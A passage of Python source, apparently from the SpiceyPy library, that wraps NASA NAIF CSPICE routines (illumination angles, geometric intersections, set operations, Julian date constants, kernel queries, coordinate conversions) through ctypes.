    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param spoint: Body-fixed coordinates of a target surface point.
    :type spoint: 3-Element Array of floats
    :return: Target surface point epoch, Vector from observer to target
     surface point, Phase angle at the surface point, Source incidence
     angle at the surface point, Emission angle at the surface point,
     Visibility flag, Illumination flag
    :rtype: tuple
    """
    # Output slots filled in by CSPICE.
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    phase = ctypes.c_double(0)
    incdnc = ctypes.c_double(0)
    emissn = ctypes.c_double(0)
    visibl = ctypes.c_int()
    lit = ctypes.c_int()
    libspice.illumf_c(stypes.stringToCharP(method),
                      stypes.stringToCharP(target),
                      stypes.stringToCharP(ilusrc),
                      ctypes.c_double(et),
                      stypes.stringToCharP(fixref),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(obsrvr),
                      stypes.toDoubleVector(spoint),
                      ctypes.byref(trgepc), srfvec, ctypes.byref(phase),
                      ctypes.byref(incdnc), ctypes.byref(emissn),
                      ctypes.byref(visibl), ctypes.byref(lit))
    return (trgepc.value, stypes.cVectorToPython(srfvec), phase.value,
            incdnc.value, emissn.value, bool(visibl.value), bool(lit.value))
@spiceErrorCheck
def illumg(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint):
    """
    Find the illumination angles (phase, incidence, and
    emission) at a specified surface point of a target body.
    The surface of the target body may be represented by a triaxial
    ellipsoid or by topographic data provided by DSK files.
    The illumination source is a specified ephemeris object.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/illumg_c.html
    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param ilusrc: Name of illumination source.
    :type ilusrc: str
    :param et: Epoch in ephemeris seconds past J2000.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Desired aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param spoint: Body-fixed coordinates of a target surface point.
    :type spoint: 3-Element Array of floats
    :return: Target surface point epoch, Vector from observer to target
     surface point, Phase angle at the surface point, Source incidence
     angle at the surface point, Emission angle at the surface point,
    :rtype: tuple
    """
    method = stypes.stringToCharP(method)
    target = stypes.stringToCharP(target)
    ilusrc = stypes.stringToCharP(ilusrc)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    obsrvr = stypes.stringToCharP(obsrvr)
    spoint = stypes.toDoubleVector(spoint)
    # Output slots filled in by CSPICE.
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    phase = ctypes.c_double(0)
    incdnc = ctypes.c_double(0)
    emissn = ctypes.c_double(0)
    libspice.illumg_c(method, target, ilusrc, et, fixref, abcorr, obsrvr, spoint,
                      ctypes.byref(trgepc), srfvec, ctypes.byref(phase),
                      ctypes.byref(incdnc), ctypes.byref(emissn))
    return trgepc.value, stypes.cVectorToPython(srfvec), \
           phase.value, incdnc.value, emissn.value
@spiceErrorCheck
def ilumin(method, target, et, fixref, abcorr, obsrvr, spoint):
    """
    Find the illumination angles (phase, solar incidence, and
    emission) at a specified surface point of a target body.
    This routine supersedes illum.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ilumin_c.html
    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Desired aberration correction.
    :type abcorr: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param spoint: Body-fixed coordinates of a target surface point.
    :type spoint: 3-Element Array of floats
    :return: Target surface point epoch, Vector from observer to target
     surface point, Phase angle, Solar incidence angle, and Emission
     angle at the surface point.
    :rtype: tuple
    """
    # Output slots filled in by CSPICE.
    trgepc = ctypes.c_double(0)
    srfvec = stypes.emptyDoubleVector(3)
    phase = ctypes.c_double(0)
    solar = ctypes.c_double(0)
    emissn = ctypes.c_double(0)
    libspice.ilumin_c(stypes.stringToCharP(method),
                      stypes.stringToCharP(target),
                      ctypes.c_double(et),
                      stypes.stringToCharP(fixref),
                      stypes.stringToCharP(abcorr),
                      stypes.stringToCharP(obsrvr),
                      stypes.toDoubleVector(spoint),
                      ctypes.byref(trgepc),
                      srfvec, ctypes.byref(phase), ctypes.byref(solar),
                      ctypes.byref(emissn))
    return (trgepc.value, stypes.cVectorToPython(srfvec),
            phase.value, solar.value, emissn.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def inedpl(a, b, c, plane):
    """
    Find the intersection of a triaxial ellipsoid and a plane.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inedpl_c.html
    :param a: Length of ellipsoid semi-axis lying on the x-axis.
    :type a: float
    :param b: Length of ellipsoid semi-axis lying on the y-axis.
    :type b: float
    :param c: Length of ellipsoid semi-axis lying on the z-axis.
    :type c: float
    :param plane: Plane that intersects ellipsoid.
    :type plane: spiceypy.utils.support_types.Plane
    :return: Intersection ellipse.
    :rtype: spiceypy.utils.support_types.Ellipse
    """
    assert (isinstance(plane, stypes.Plane))
    ellipse = stypes.Ellipse()
    found = ctypes.c_int()
    libspice.inedpl_c(ctypes.c_double(a),
                      ctypes.c_double(b),
                      ctypes.c_double(c),
                      ctypes.byref(plane), ctypes.byref(ellipse),
                      ctypes.byref(found))
    return ellipse, bool(found.value)
@spiceErrorCheck
def inelpl(ellips, plane):
    """
    Find the intersection of an ellipse and a plane.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inelpl_c.html
    :param ellips: A SPICE ellipse.
    :type ellips: spiceypy.utils.support_types.Ellipse
    :param plane: A SPICE plane.
    :type plane: spiceypy.utils.support_types.Plane
    :return:
            Number of intersection points of plane and ellipse,
            Point 1,
            Point 2.
    :rtype: tuple
    """
    assert (isinstance(plane, stypes.Plane))
    assert (isinstance(ellips, stypes.Ellipse))
    # Output slots: intersection count and up to two intersection points.
    nxpts = ctypes.c_int()
    xpt1 = stypes.emptyDoubleVector(3)
    xpt2 = stypes.emptyDoubleVector(3)
    libspice.inelpl_c(ctypes.byref(ellips), ctypes.byref(plane),
                      ctypes.byref(nxpts), xpt1, xpt2)
    return nxpts.value, stypes.cVectorToPython(xpt1), stypes.cVectorToPython(xpt2)
@spiceErrorCheck
def inrypl(vertex, direct, plane):
    """
    Find the intersection of a ray and a plane.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inrypl_c.html
    :param vertex: Vertex vector of ray.
    :type vertex: 3-Element Array of floats
    :param direct: Direction vector of ray.
    :type direct: 3-Element Array of floats
    :param plane: A SPICE plane.
    :type plane: spiceypy.utils.support_types.Plane
    :return:
            Number of intersection points of ray and plane,
            Intersection point,
            if nxpts == 1.
    :rtype: tuple
    """
    assert (isinstance(plane, stypes.Plane))
    nxpts = ctypes.c_int()
    xpt = stypes.emptyDoubleVector(3)
    libspice.inrypl_c(stypes.toDoubleVector(vertex),
                      stypes.toDoubleVector(direct),
                      ctypes.byref(plane), ctypes.byref(nxpts),
                      xpt)
    return nxpts.value, stypes.cVectorToPython(xpt)
@spiceErrorCheck
def insrtc(item, inset):
    """
    Insert an item (or each item of a list) into a character set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrtc_c.html
    :param item: Item to be inserted.
    :type item: str or list of str
    :param inset: Insertion set.
    :type inset: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(inset, stypes.SpiceCell)
    # Accept either one string or a list of strings for convenience.
    items = item if isinstance(item, list) else [item]
    for entry in items:
        libspice.insrtc_c(stypes.stringToCharP(entry), ctypes.byref(inset))
@spiceErrorCheck
def insrtd(item, inset):
    """
    Insert an item (or each item of an iterable) into a double
    precision set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrtd_c.html
    :param item: Item to be inserted.
    :type item: Union[float,Iterable[float]]
    :param inset: Insertion set.
    :type inset: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(inset, stypes.SpiceCell)
    # Scalars and iterables are both accepted; normalize to a sequence.
    values = item if hasattr(item, "__iter__") else [item]
    for value in values:
        libspice.insrtd_c(ctypes.c_double(value), ctypes.byref(inset))
@spiceErrorCheck
def insrti(item, inset):
    """
    Insert an item (or each item of an iterable) into an integer set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/insrti_c.html
    :param item: Item to be inserted.
    :type item: Union[int,Iterable[int]]
    :param inset: Insertion set.
    :type inset: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(inset, stypes.SpiceCell)
    # Scalars and iterables are both accepted; normalize to a sequence.
    values = item if hasattr(item, "__iter__") else [item]
    for value in values:
        libspice.insrti_c(ctypes.c_int(value), ctypes.byref(inset))
@spiceErrorCheck
def inter(a, b):
    """
    Intersect two sets of any data type to form a third set.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/inter_c.html
    :param a: First input set.
    :type a: spiceypy.utils.support_types.SpiceCell
    :param b: Second input set.
    :type b: spiceypy.utils.support_types.SpiceCell
    :return: Intersection of a and b.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    assert isinstance(a, stypes.SpiceCell)
    assert isinstance(b, stypes.SpiceCell)
    assert a.dtype == b.dtype
    # Compare dtype with "==", not "is": identity comparison against int
    # literals relies on CPython's small-int caching and triggers a
    # SyntaxWarning on Python >= 3.8.
    if a.dtype == 0:
        c = stypes.SPICECHAR_CELL(max(a.size, b.size), max(a.length, b.length))
    elif a.dtype == 1:
        c = stypes.SPICEDOUBLE_CELL(max(a.size, b.size))
    elif a.dtype == 2:
        c = stypes.SPICEINT_CELL(max(a.size, b.size))
    else:
        raise NotImplementedError
    libspice.inter_c(ctypes.byref(a), ctypes.byref(b), ctypes.byref(c))
    return c
@spiceErrorCheck
def intmax():
    """
    Return the value of the largest (positive) number representable
    in an int variable.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/intmax_c.html
    :return: The largest (positive) number representable in an int variable.
    :rtype: int
    """
    return libspice.intmax_c()
@spiceErrorCheck
def intmin():
    """
    Return the value of the smallest (negative) number representable
    in a SpiceInt variable.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/intmin_c.html
    :return: The smallest (negative) number representable in an int variable.
    :rtype: int
    """
    return libspice.intmin_c()
@spiceErrorCheck
def invert(m):
    """
    Generate the inverse of a 3x3 matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/invert_c.html
    :param m: Matrix to be inverted.
    :type m: 3x3-Element Array of floats
    :return: Inverted matrix (m1)^-1
    :rtype: 3x3-Element Array of floats
    """
    out = stypes.emptyDoubleMatrix()
    libspice.invert_c(stypes.toDoubleMatrix(m), out)
    return stypes.cMatrixToNumpy(out)
@spiceErrorCheck
def invort(m):
    """
    Given a matrix, construct the matrix whose rows are the columns of
    the input divided by the length squared of the corresponding
    columns of the input matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/invort_c.html
    :param m: A 3x3 Matrix.
    :type m: 3x3-Element Array of floats
    :return: m after transposition and scaling of rows.
    :rtype: 3x3-Element Array of floats
    """
    out = stypes.emptyDoubleMatrix()
    libspice.invort_c(stypes.toDoubleMatrix(m), out)
    return stypes.cMatrixToNumpy(out)
@spiceErrorCheck
def isordv(array, n):
    """
    Determine whether an array of n items contains the integers
    0 through n-1.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isordv_c.html
    :param array: Array of integers.
    :type array: Array of ints
    :param n: Number of integers in array.
    :type n: int
    :return:
            The function returns True if the array contains the
            integers 0 through n-1, otherwise it returns False.
    :rtype: bool
    """
    array = stypes.toIntVector(array)
    n = ctypes.c_int(n)
    # CSPICE returns a SpiceBoolean (int); coerce to a Python bool.
    return bool(libspice.isordv_c(array, n))
@spiceErrorCheck
def isrchc(value, ndim, lenvals, array):
    """
    Search for a given value within a character string array. Return
    the index of the first matching array entry, or -1 if the key
    value was not found.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchc_c.html
    :param value: Key value to be found in array.
    :type value: str
    :param ndim: Dimension of array.
    :type ndim: int
    :param lenvals: String length.
    :type lenvals: int
    :param array: Character string array to search.
    :type array: list of str
    :return:
            The index of the first matching array element or -1
            if the value is not found.
    :rtype: int
    """
    value = stypes.stringToCharP(value)
    # NOTE: the string array must be built while ndim/lenvals are still
    # plain Python ints; only afterwards are they wrapped in c_int.
    array = stypes.listToCharArrayPtr(array, xLen=lenvals, yLen=ndim)
    ndim = ctypes.c_int(ndim)
    lenvals = ctypes.c_int(lenvals)
    return libspice.isrchc_c(value, ndim, lenvals, array)
@spiceErrorCheck
def isrchd(value, ndim, array):
    """
    Search for a given value within a double precision array. Return
    the index of the first matching array entry, or -1 if the key value
    was not found.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchd_c.html
    :param value: Key value to be found in array.
    :type value: float
    :param ndim: Dimension of array.
    :type ndim: int
    :param array: Double Precision array to search.
    :type array: Array of floats
    :return:
            The index of the first matching array element or -1
            if the value is not found.
    :rtype: int
    """
    # Straight marshalling: scalar -> c_double/c_int, sequence -> C array.
    value = ctypes.c_double(value)
    ndim = ctypes.c_int(ndim)
    array = stypes.toDoubleVector(array)
    return libspice.isrchd_c(value, ndim, array)
@spiceErrorCheck
def isrchi(value, ndim, array):
    """
    Search for a given value within an integer array. Return
    the index of the first matching array entry, or -1 if the key
    value was not found.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrchi_c.html
    :param value: Key value to be found in array.
    :type value: int
    :param ndim: Dimension of array.
    :type ndim: int
    :param array: Integer array to search.
    :type array: Array of ints
    :return:
            The index of the first matching array element or -1
            if the value is not found.
    :rtype: int
    """
    # Integer twin of isrchd: same marshalling, int flavored.
    value = ctypes.c_int(value)
    ndim = ctypes.c_int(ndim)
    array = stypes.toIntVector(array)
    return libspice.isrchi_c(value, ndim, array)
@spiceErrorCheck
def isrot(m, ntol, dtol):
    """
    Indicate whether a 3x3 matrix is a rotation matrix.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/isrot_c.html
    :param m: A matrix to be tested.
    :type m: 3x3-Element Array of floats
    :param ntol: Tolerance for the norms of the columns of m.
    :type ntol: float
    :param dtol:
            Tolerance for the determinant of a matrix whose columns
            are the unitized columns of m.
    :type dtol: float
    :return: True if and only if m is a rotation matrix.
    :rtype: bool
    """
    m = stypes.toDoubleMatrix(m)
    ntol = ctypes.c_double(ntol)
    dtol = ctypes.c_double(dtol)
    # CSPICE returns a SpiceBoolean (int); coerce to a Python bool.
    return bool(libspice.isrot_c(m, ntol, dtol))
@spiceErrorCheck
def iswhsp(string):
    """
    Return a boolean value indicating whether a string contains
    only white space characters.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/iswhsp_c.html
    :param string: String to be tested.
    :type string: str
    :return:
            the boolean value True if the string is empty or contains
            only white space characters; otherwise it returns the value False.
    :rtype: bool
    """
    # NOTE: the CSPICE routine is used rather than Python's str.isspace()
    # (which returns False for an empty string).
    string = stypes.stringToCharP(string)
    return bool(libspice.iswhsp_c(string))
################################################################################
# J
@spiceErrorCheck
def j1900():
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j1900_c.html
    :return: Julian Date of 1899 DEC 31 12:00:00
    :rtype: float
    """
    # Constant provided by CSPICE; no arguments to marshal.
    return libspice.j1900_c()
@spiceErrorCheck
def j1950():
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j1950_c.html
    :return: Julian Date of 1950 JAN 01 00:00:00
    :rtype: float
    """
    # Constant provided by CSPICE; no arguments to marshal.
    return libspice.j1950_c()
@spiceErrorCheck
def j2000():
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j2000_c.html
    :return: Julian Date of 2000 JAN 01 12:00:00
    :rtype: float
    """
    # Constant provided by CSPICE; no arguments to marshal.
    return libspice.j2000_c()
@spiceErrorCheck
def j2100():
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/j2100_c.html
    :return: Julian Date of 2100 JAN 01 12:00:00
    :rtype: float
    """
    # Constant provided by CSPICE; no arguments to marshal.
    return libspice.j2100_c()
@spiceErrorCheck
def jyear():
    """
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/jyear_c.html
    :return: number of seconds in a julian year
    :rtype: float
    """
    # Constant provided by CSPICE; no arguments to marshal.
    return libspice.jyear_c()
################################################################################
# K
@spiceErrorCheck
def kclear():
    """
    Clear the KEEPER subsystem: unload all kernels, clear the kernel
    pool, and re-initialize the subsystem. Existing watches on kernel
    variables are retained.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kclear_c.html
    """
    # Side-effect-only call; no arguments, no return value.
    libspice.kclear_c()
@spiceErrorCheck
@spiceFoundExceptionThrower
def kdata(which, kind, fillen=_default_len_out, typlen=_default_len_out, srclen=_default_len_out):
    """
    Return data for the nth kernel that is among a list of specified
    kernel types.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kdata_c.html
    :param which: Index of kernel to fetch from the list of kernels.
    :type which: int
    :param kind: The kind of kernel to which fetches are limited.
    :type kind: str
    :param fillen: Available space in output file string.
    :type fillen: int
    :param typlen: Available space in output kernel type string.
    :type typlen: int
    :param srclen: Available space in output source string.
    :type srclen: int
    :return:
            The name of the kernel file, The type of the kernel,
            Name of the source file used to load file,
            The handle attached to file.
    :rtype: tuple
    """
    which = ctypes.c_int(which)
    kind = stypes.stringToCharP(kind)
    fillen = ctypes.c_int(fillen)
    typlen = ctypes.c_int(typlen)
    srclen = ctypes.c_int(srclen)
    # NOTE(review): stringToCharP is handed the c_int lengths here,
    # presumably allocating empty output buffers of that size — kinfo()
    # below builds blank strings instead; confirm against stypes.
    file = stypes.stringToCharP(fillen)
    filtyp = stypes.stringToCharP(typlen)
    source = stypes.stringToCharP(srclen)
    handle = ctypes.c_int()
    found = ctypes.c_int()
    libspice.kdata_c(which, kind, fillen, typlen, srclen, file, filtyp, source,
                     ctypes.byref(handle), ctypes.byref(found))
    # The trailing "found" flag is consumed by @spiceFoundExceptionThrower.
    return stypes.toPythonString(file), stypes.toPythonString(
            filtyp), stypes.toPythonString(source), handle.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def kinfo(file, typlen=_default_len_out, srclen=_default_len_out):
    """
    Return information about a loaded kernel specified by name.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kinfo_c.html
    :param file: Name of a kernel to fetch information for
    :type file: str
    :param typlen: Available space in output kernel type string.
    :type typlen: int
    :param srclen: Available space in output source string.
    :type srclen: int
    :return:
            The type of the kernel,
            Name of the source file used to load file,
            The handle attached to file.
    :rtype: tuple
    """
    typlen = ctypes.c_int(typlen)
    srclen = ctypes.c_int(srclen)
    file = stypes.stringToCharP(file)
    # Pre-allocate blank output buffers of the requested lengths.
    filtyp = stypes.stringToCharP(" " * typlen.value)
    source = stypes.stringToCharP(" " * srclen.value)
    handle = ctypes.c_int()
    found = ctypes.c_int()
    libspice.kinfo_c(file, typlen, srclen, filtyp, source, ctypes.byref(handle),
                     ctypes.byref(found))
    # The trailing "found" flag is consumed by @spiceFoundExceptionThrower.
    return stypes.toPythonString(filtyp), stypes.toPythonString(
            source), handle.value, bool(found.value)
@spiceErrorCheck
def kplfrm(frmcls, outCell=None):
    """
    Return a SPICE set containing the frame IDs of all reference
    frames of a given class having specifications in the kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kplfrm_c.html
    :param frmcls: Frame class.
    :type frmcls: int
    :param outCell: Optional output Spice Int Cell
    :type outCell: spiceypy.utils.support_types.SpiceCell
    :return: Set of ID codes of frames of the specified class.
    :rtype: spiceypy.utils.support_types.SpiceCell
    """
    # Default cell is created per call (no mutable default argument).
    if not outCell:
        outCell = stypes.SPICEINT_CELL(1000)
    frmcls = ctypes.c_int(frmcls)
    libspice.kplfrm_c(frmcls, ctypes.byref(outCell))
    return outCell
@spiceErrorCheck
def ktotal(kind):
    """
    Return the current number of kernels that have been loaded
    via the KEEPER interface that are of a specified type.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ktotal_c.html
    :param kind: A list of kinds of kernels to count.
    :type kind: str
    :return: The number of kernels of type kind.
    :rtype: int
    """
    kind = stypes.stringToCharP(kind)
    # Output parameter pattern: CSPICE writes the count through a pointer.
    count = ctypes.c_int()
    libspice.ktotal_c(kind, ctypes.byref(count))
    return count.value
@spiceErrorCheck
@spiceFoundExceptionThrower
def kxtrct(keywd, terms, nterms, instring, termlen=_default_len_out, stringlen=_default_len_out, substrlen=_default_len_out):
    """
    Locate a keyword in a string and extract the substring from
    the beginning of the first word following the keyword to the
    beginning of the first subsequent recognized terminator of a list.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/kxtrct_c.html
    :param keywd: Word that marks the beginning of text of interest.
    :type keywd: str
    :param terms: Set of words, any of which marks the end of text.
    :type terms: Array of str
    :param nterms: Number of terms.
    :type nterms: int
    :param instring: String containing a sequence of words.
    :type instring: str
    :param termlen: Length of strings in string array term.
    :type termlen: int
    :param stringlen: Available space in argument string.
    :type stringlen: int
    :param substrlen: Available space in output substring.
    :type substrlen: int
    :return:
            String containing a sequence of words,
            String from end of keywd to beginning of first terms item found.
    :rtype: tuple
    """
    assert nterms <= len(terms)
    # Python strings and string arrays => to C char pointers
    keywd = stypes.stringToCharP(keywd)
    # Each term is clipped to termlen-1 chars so it fits with its NUL.
    terms = stypes.listToCharArrayPtr([s[:termlen-1] for s in terms[:nterms]],xLen=termlen,yLen=nterms)
    # instring is in/out: CSPICE rewrites it in place, hence the explicit
    # buffer length (inlen) and the clip to stringlen-1.
    instring = stypes.stringToCharP(instring[:stringlen-1],inlen=stringlen)
    substr = stypes.stringToCharP(substrlen)
    # Python ints => to C ints
    termlen = ctypes.c_int(termlen)
    nterms = ctypes.c_int(nterms)
    stringlen = ctypes.c_int(stringlen)
    substrlen = ctypes.c_int(substrlen)
    found = ctypes.c_int()
    libspice.kxtrct_c(keywd, termlen, terms, nterms,
                      stringlen, substrlen, instring, ctypes.byref(found),
                      substr)
    # The trailing "found" flag is consumed by @spiceFoundExceptionThrower.
    return stypes.toPythonString(instring), stypes.toPythonString(
            substr), bool(found.value)
################################################################################
# L
@spiceErrorCheck
def lastnb(string):
    """
    Return the zero based index of the last non-blank character in
    a character string.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lastnb_c.html
    :param string: Input character string.
    :type string: str
    :return: zero based index of the last non-blank character in string.
    :rtype: int
    """
    string = stypes.stringToCharP(string)
    return libspice.lastnb_c(string)
@spiceErrorCheck
def latcyl(radius, lon, lat):
    """
    Convert from latitudinal coordinates to cylindrical coordinates.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latcyl_c.html
    :param radius: Distance of a point from the origin.
    :type radius: float
    :param lon: Angle of the point from the XZ plane in radians.
    :type lon: float
    :param lat: Angle of the point from the XY plane in radians.
    :type lat: float
    :return: (r, lonc, z)
    :rtype: tuple
    """
    radius = ctypes.c_double(radius)
    lon = ctypes.c_double(lon)
    lat = ctypes.c_double(lat)
    # Three scalar output parameters written through pointers by CSPICE.
    r = ctypes.c_double()
    lonc = ctypes.c_double()
    z = ctypes.c_double()
    libspice.latcyl_c(radius, lon, lat, ctypes.byref(r), ctypes.byref(lonc),
                      ctypes.byref(z))
    return r.value, lonc.value, z.value
@spiceErrorCheck
def latrec(radius, longitude, latitude):
    """
    Convert from latitudinal coordinates to rectangular coordinates.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latrec_c.html
    :param radius: Distance of a point from the origin.
    :type radius: float
    :param longitude: Longitude of point in radians.
    :type longitude: float
    :param latitude: Latitude of point in radians.
    :type latitude: float
    :return: Rectangular coordinates of the point.
    :rtype: 3-Element Array of floats
    """
    radius = ctypes.c_double(radius)
    longitude = ctypes.c_double(longitude)
    latitude = ctypes.c_double(latitude)
    # CSPICE fills the 3-vector output buffer in place.
    rectan = stypes.emptyDoubleVector(3)
    libspice.latrec_c(radius, longitude, latitude, rectan)
    return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def latsph(radius, lon, lat):
    """
    Convert from latitudinal coordinates to spherical coordinates.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsph_c.html
    :param radius: Distance of a point from the origin.
    :type radius: float
    :param lon: Angle of the point from the XZ plane in radians.
    :type lon: float
    :param lat: Angle of the point from the XY plane in radians.
    :type lat: float
    :return: (rho, colat, lons)
    :rtype: tuple
    """
    radius = ctypes.c_double(radius)
    lon = ctypes.c_double(lon)
    lat = ctypes.c_double(lat)
    # Three scalar output parameters written through pointers by CSPICE.
    rho = ctypes.c_double()
    colat = ctypes.c_double()
    lons = ctypes.c_double()
    libspice.latsph_c(radius, lon, lat, ctypes.byref(rho), ctypes.byref(colat),
                      ctypes.byref(lons))
    return rho.value, colat.value, lons.value
@spiceErrorCheck
def latsrf(method, target, et, fixref, lonlat):
    """
    Map array of planetocentric longitude/latitude coordinate pairs
    to surface points on a specified target body.
    The surface of the target body may be represented by a triaxial
    ellipsoid or by topographic data provided by DSK files.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/latsrf_c.html
    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in TDB seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param lonlat: Array of longitude/latitude coordinate pairs.
    :type lonlat: A 2xM-Element Array of floats
    :return: Array of surface points.
    :rtype: A 3xM-Element Array of floats
    """
    method = stypes.stringToCharP(method)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    # Pair count must be taken before lonlat is converted to a C matrix.
    npts = ctypes.c_int(len(lonlat))
    lonlat = stypes.toDoubleMatrix(lonlat)
    srfpts = stypes.emptyDoubleMatrix(3, npts.value)
    libspice.latsrf_c(method, target, et, fixref, npts, lonlat, srfpts)
    return stypes.cMatrixToNumpy(srfpts)
@spiceErrorCheck
def lcase(instr, lenout=_default_len_out):
    """
    Convert the characters in a string to lowercase.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/lcase_c.html
    :param instr: Input string.
    :type instr: str
    :param lenout: Maximum length of output string.
    :type lenout: int
    :return: Output string, all lowercase.
    :rtype: str
    """
    instr = stypes.stringToCharP(instr)
    lenout = ctypes.c_int(lenout)
    # stringToCharP given a c_int allocates an output buffer of that length.
    outstr = stypes.stringToCharP(lenout)
    libspice.lcase_c(instr, lenout, outstr)
    return stypes.toPythonString(outstr)
@spiceErrorCheck
def ldpool(filename):
    """
    Load the variables contained in a NAIF ASCII kernel file into the
    kernel pool.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ldpool_c.html
    :param filename: Name of the kernel file.
    :type filename: str
    """
    # Side-effect-only call: modifies the global kernel pool.
    filename = stypes.stringToCharP(filename)
    libspice.ldpool_c(filename)
@spiceErrorCheck
def limbpt(method, target, et, fixref, abcorr, corloc, obsrvr, refvec, rolstp, ncuts, schstp, soltol, maxn):
    """
    Find limb points on a target body. The limb is the set of points
    of tangency on the target of rays emanating from the observer.
    The caller specifies half-planes bounded by the observer-target
    center vector in which to search for limb points.
    The surface of the target body may be represented either by a
    triaxial ellipsoid or by topographic data.
    https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/limbpt_c.html
    :param method: Computation method.
    :type method: str
    :param target: Name of target body.
    :type target: str
    :param et: Epoch in ephemeris seconds past J2000 TDB.
    :type et: float
    :param fixref: Body-fixed, body-centered target body frame.
    :type fixref: str
    :param abcorr: Aberration correction.
    :type abcorr: str
    :param corloc: Aberration correction locus.
    :type corloc: str
    :param obsrvr: Name of observing body.
    :type obsrvr: str
    :param refvec: Reference vector for cutting half-planes.
    :type refvec: 3-Element Array of floats
    :param rolstp: Roll angular step for cutting half-planes.
    :type rolstp: float
    :param ncuts: Number of cutting half-planes.
    :type ncuts: int
    :param schstp: Angular step size for searching.
    :type schstp: float
    :param soltol: Solution convergence tolerance.
    :type soltol: float
    :param maxn: Maximum number of entries in output arrays.
    :type maxn: int
    :return: Counts of limb points corresponding to cuts, Limb points, Times associated with limb points, Tangent vectors emanating from the observer
    :rtype: tuple
    """
    method = stypes.stringToCharP(method)
    target = stypes.stringToCharP(target)
    et = ctypes.c_double(et)
    fixref = stypes.stringToCharP(fixref)
    abcorr = stypes.stringToCharP(abcorr)
    corloc = stypes.stringToCharP(corloc)
    obsrvr = stypes.stringToCharP(obsrvr)
    refvec = stypes.toDoubleVector(refvec)
    rolstp = ctypes.c_double(rolstp)
    ncuts = ctypes.c_int(ncuts)
    schstp = ctypes.c_double(schstp)
    soltol = ctypes.c_double(soltol)
    maxn = ctypes.c_int(maxn)
    # Output buffers sized to the caller's maximum.
    npts = stypes.emptyIntVector(maxn.value)
    points = stypes.emptyDoubleMatrix(3, maxn.value)
    # NOTE(review): emptyDoubleVector receives the c_int here while the
    # matrices get maxn.value — presumably stypes accepts both; confirm.
    epochs = stypes.emptyDoubleVector(maxn)
    tangts = stypes.emptyDoubleMatrix(3, maxn.value)
    libspice.limbpt_c(method, target, et, fixref,
                      abcorr, corloc, obsrvr, refvec,
